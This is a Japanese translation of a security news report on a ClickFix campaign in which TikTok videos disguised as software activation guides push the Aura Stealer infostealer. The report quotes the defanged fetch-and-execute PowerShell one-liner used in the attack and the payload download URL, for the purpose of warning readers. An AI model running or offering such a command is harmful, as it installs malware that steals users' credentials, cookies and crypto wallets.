サイバー犯罪者は、Windows、Spotify、Netflixなどの人気ソフトウェアの無料アクティベーションガイドに偽装したTikTok動画を利用して、情報窃取型マルウェアを拡散しています。
ISCハンドラーのXavier Mertensがこの継続中のキャンペーンを発見しました。これは主に、Trend Microが5月に観測したものと同じです。
BleepingComputerが確認したTikTok動画は、Windows、Microsoft 365、Adobe Premiere、Photoshop、CapCut Pro、Discord Nitroなどの正規製品や、NetflixやSpotify Premiumのような架空のサービスのアクティベーション方法を案内するふりをしています。
出典: BleepingComputer.com
これらの動画はClickFix攻撃を実行しており、これは正規の「修正」や手順を装ってユーザーを騙し、悪意のあるPowerShellコマンドやその他のスクリプトを実行させてマルウェアに感染させるソーシャルエンジニアリング手法です。
各動画は短い1行のコマンドを表示し、視聴者にPowerShellで管理者として実行するよう指示します:
iex (irm slmgr[.]win/photoshop)なお、URL内のプログラム名は偽装しているプログラムによって異なります。例えば、偽のWindowsアクティベーション動画では、URLにphotoshopの代わりにwindowsが含まれます。
このキャンペーンでは、コマンドが実行されると、PowerShellがリモートサイトslmgr[.]winに接続し、別のPowerShellスクリプトを取得して実行します。
このスクリプトはCloudflare Pagesから2つの実行ファイルをダウンロードします。最初の実行ファイルはhttps://file-epq[.]pages[.]dev/updater.exe [VirusTotal]からダウンロードされます。この実行ファイルは、Aura Stealerという情報窃取型マルウェアの亜種です。
Aura Stealerは、ブラウザに保存された認証情報、認証クッキー、暗号通貨ウォレット、その他のアプリケーションの認証情報を収集し、攻撃者にアップロードすることで、アカウントへのアクセスを可能にします。
Mertensによると、追加のペイロードがsource.exeという名前でダウンロードされるとのことです [VirusTotal]。これは.NETの組み込みVisual C# Compiler(csc.exe)を使ってコードを自己コンパイルするために使用されます。このコードはメモリ内に注入され、実行されます。
追加のペイロードの目的は依然として不明です。
これらの手順を実行したユーザーは、すべての認証情報が漏洩したと考え、利用しているすべてのサイトのパスワードを直ちにリセットするべきです。
ClickFix攻撃は過去1年間で非常に一般的になり、ランサムウェアや暗号通貨窃盗キャンペーンで様々なマルウェアの配布に利用されています。
一般的なルールとして、ユーザーはウェブサイトからテキストをコピーして、ファイルエクスプローラーのアドレスバー、コマンドプロンプト、PowerShellプロンプト、macOSターミナル、Linuxシェルなど、オペレーティングシステムのダイアログボックスで実行してはいけません。
